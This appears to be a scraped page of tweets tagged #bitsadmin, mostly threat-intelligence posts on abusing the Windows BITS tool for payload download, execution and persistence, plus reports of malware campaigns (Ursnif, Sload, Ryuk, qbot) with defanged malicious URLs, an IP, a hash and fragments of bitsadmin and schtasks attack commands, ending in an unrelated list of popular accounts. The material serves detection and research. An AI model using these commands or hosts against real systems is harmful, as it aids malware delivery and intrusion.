Top Tweets for #bitsadmin
📡 Abusing #bitsadmin for Covert Execution
Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a Living-Off-The-Land Binary and Script (#LOLBAS) to download and execute arbitrary payloads, disguise persistence, and evade detection through alternate data streams (ADS).
This behavior aligns with multiple MITRE ATT&CK® techniques such as T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution), and T1564.004 (NTFS File Attributes - ADS).
---
🧱 #Technique Breakdown
bitsadmin can be abused in multiple use cases such as:
> File #Download: Arbitrary executables (e.g., calc.exe) can be downloaded from remote sources and saved locally.
> Command #Execution: Once downloaded, payloads can be executed via SetNotifyCmdLine, triggering binary execution upon job completion.
> #Persistence via ADS: Code can be hidden in NTFS alternate data streams.
> #Proxy Execution: As a trusted Windows binary, bitsadmin.exe can serve as an indirect launcher, bypassing some application control policies.
---
🐍 PoC Automation via #Python
The following script automates the entire exploit chain:
> Sets up a local HTTP server to host the payload
> Downloads the payload using bitsadmin
> Executes it via a SetNotifyCmdLine callback
> Cleans up all artifacts post-execution
This method avoids the need for dropping new executables by leveraging signed Windows tools, making detection significantly harder.
- Project @ Github: https://t.co/Uakn7c3l8h
---
🔍 #Detection & #Mitigation
> Monitor bitsadmin.exe child process activity.
> Look for job creation with suspicious file transfers or ADS involvement.
> Restrict or disable usage of bitsadmin.exe via AppLocker or WDAC.
> Monitor NTFS alternate data streams and flag execution attempts.
- https://t.co/thWuQ5nVnK
#CyberSecurity #LOLBAS #OffensiveSecurity #RedTeam #PenetrationTesting #BlueTeam #InfoSec #Offsec #Logisek

A #mustread #howto for #threathunting on Windows systems
#TrustEverybodyButCutTheCards
#DLLhijacking #WindowsManagementInstrumentation #WMI #ComponentObjectModel #COM #exploit #mitreattack #BITSadmin
The Art of Windows #Persistence
@arimaqz, @kryolite_secure, @Hadess_security

Using #bitsadmin for #C2 communications isn’t the stealthier way of working but… if it works! ;-) #Botconf2023
Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin
📬 Oggetto: "Commissione di vigilanza sul registro tributario"
⚔️ TTP:
Email > Link > RAR > HTA > bitsadmin > DLL
💣 Disponibili gli #IoC 👇
🔗 https://t.co/A2eHTdOfPm
Telegram: https://t.co/KfItBVeWTQ

#cybercrime, campagna #Ursnif in #Italia via #AgenziadelleEntrate. L’allegato zip nella mail contiene un file #HTA. Questo tramite #bitsadmin contatta un unico url e scarica la dll, avviando l’infezione del #Malware. #CyberSecurity #infosec @JAMESWT_MHT https://t.co/xrJOsEPiDO
#cybercrime, campagna #Ursnif in #Italia via #agenziadelleentrate. L’allegato zip nella mail contiene un file #HTA. Questo tramite #bitsadmin contatta un unico url e scarica la dll, avviando l’infezione del #malware. #cybersecurity #infosec #jameswt https://t.co/K6sQkYSR8j
#Ursnif/#Gozi> #INPS come esca in doppia campagna per veicolare il #bankingtrojan: messaggi simili, allegato #zip per entrambi; cambia il vettore d'infezione. L'analisi di @JAMESWT_MHT nell'articolo di @FBussoletti 👉🏽https://t.co/IL9NOuB45m #powershell #bitsadmin #cybersecurity

#malspam 🇮🇹 PEC with #bitsadmin #powershell drops #sload ver=4.2.6 gtag=x2401
🧐🧐🧐
@malwrhunterteam @reecdeep @James_inthe_box @JAMESWT_MHT @malware_traffic @Racco42 @makflwana @pollo290987

#MalwareAnalysis: Activists Turn #Hacktivists, New #Ransomware That Does Not Demand Money
https://t.co/VOi4KIXO4C
@quickheal
𝞝
#Enterprises #Organizations
#Malware #SARBLOH
#CyberThreats #Bitsadmin
#InfoSec #CyberSecurity
#Hiberfil #Encryption
#KhalsaCyberFauj
#CyberAttacks

#hta with plain #VBScript -> #bitsadmin (VT 3/58)
159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2
#njrat https[://filetransfer.io/data-package/yovW0lpr/download

#Avvadon: nuova versione del #ransomware viene veicolata tramite la #botnet #phorpiex(trik) in campagna #malspam. Gli Indicatori di Compromissione e i consigli del @csirt_it HT @FBussoletti https://t.co/EPfr8SwhHx #JavaScript #Powershell #Bitsadmin #cybersecurity @eteria_cloud

#RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!
![vikas891's tweet photo. #RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage! https://t.co/PdmvXWIXto](https://pbs.twimg.com/media/EQ-QkH8U4AAoXTl.png)
@VirITeXplorer @JAMESWT_MHT @58_158_177_102 @BleepinComputer @virusbtn @demonslay335 @struppigel @peterkruse @fwosar @martijn_grooten @malwrhunterteam I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.

#Sload campaign using #bitsadmin targets #Italy
https://t.co/bEfZNj4zDx
@JAMESWT_MHT
@malwrhunterteam
@luc4m
@JayTHL
@dvk01uk
@JRoosen
@reecdeep
@James_inthe_box
#Bitsadmin es una utilidad de transferencia en segundo plano incluido en Windows desde XP, facilita la transferencia asíncrona y acelerada de archivos que usan ancho de banda de red inactivo. Lo usan muchas apps como Chrome, Firefox, Windows Update y cientos de malwares...

#interesting sample
https://t.co/Ht0HJWsz8O
IOCs
https://t.co/ejndfpOF2c
#bitsadmin + #certutil
@James_inthe_box @kafeine @malwrhunterteam @Arkbird_SOLG @VK_Intel
#VBScript utilizes #bitsadmin to dl #PE (seems to be #qbot)
hxxp://proto.thriftyhealthyandhappy.com/scintillating.png
hxxp://ank.tastywieners.com/ubiquitous.png
hxxp://horse.tastywienersonwheels.com/nouveau-riche.png
hxxp://old.oshkoshrugby.com/caustic.png
url + ?bg=sp39&os=&av=

"Relazione di notifica atto" #ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /dod.suze10n1.com/pagjory63.php
yet with link to #googledrive fake pdf ->
/dod.suzienow.com/jogghfptu=w?bqa=3
https://t.co/7ZD0hcEQLt
https://t.co/NyfxyL0mms
@VirITeXplorer @CertPa

"Relazione di notifica atto"
#ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /bob.suzetrust.com/pagjory63.php and schtasks /create /st 16:05 /sc once /tn pUm /tr
Samples (vbs and payload)
https://t.co/HX5MFDBpap
@CertPa @VirITeXplorer @SettiDavide89

interesting #malicious #xls (simple structure) using #DDE -> drops #vbs -> runs cmd commands -> #bitsadmin -> #PE
/rroun-nourr.ga//files/Quotation.exe
Interesting part: server is #opendir and has a #webshell (#WSO 2.6). u can dl the #phishing kit & move arround ; )

Most Popular Users

Elon Musk 
@elonmusk
240.8M followers

Barack Obama 
@barackobama
119.2M followers

Donald J. Trump 
@realdonaldtrump
111.7M followers

Cristiano Ronaldo 
@cristiano
111.1M followers

Narendra Modi 
@narendramodi
107M followers

Rihanna 
@rihanna
97.8M followers

NASA 
@nasa
92.2M followers

Justin Bieber 
@justinbieber
91M followers

KATY PERRY 
@katyperry
87.9M followers

Taylor Swift 
@taylorswift13
81.8M followers

Lady Gaga 
@ladygaga
73.3M followers

Virat Kohli 
@imvkohli
70.3M followers

Kim Kardashian 
@kimkardashian
69.9M followers

YouTube 
@youtube
68.7M followers

Bill Gates 
@billgates
64M followers

Neymar Jr 
@neymarjr
63.1M followers

The Ellen Show
@theellenshow
62.4M followers

CNN 
@cnn
61.9M followers

Selena Gomez 
@selenagomez
61M followers

X 
@x
60.8M followers





























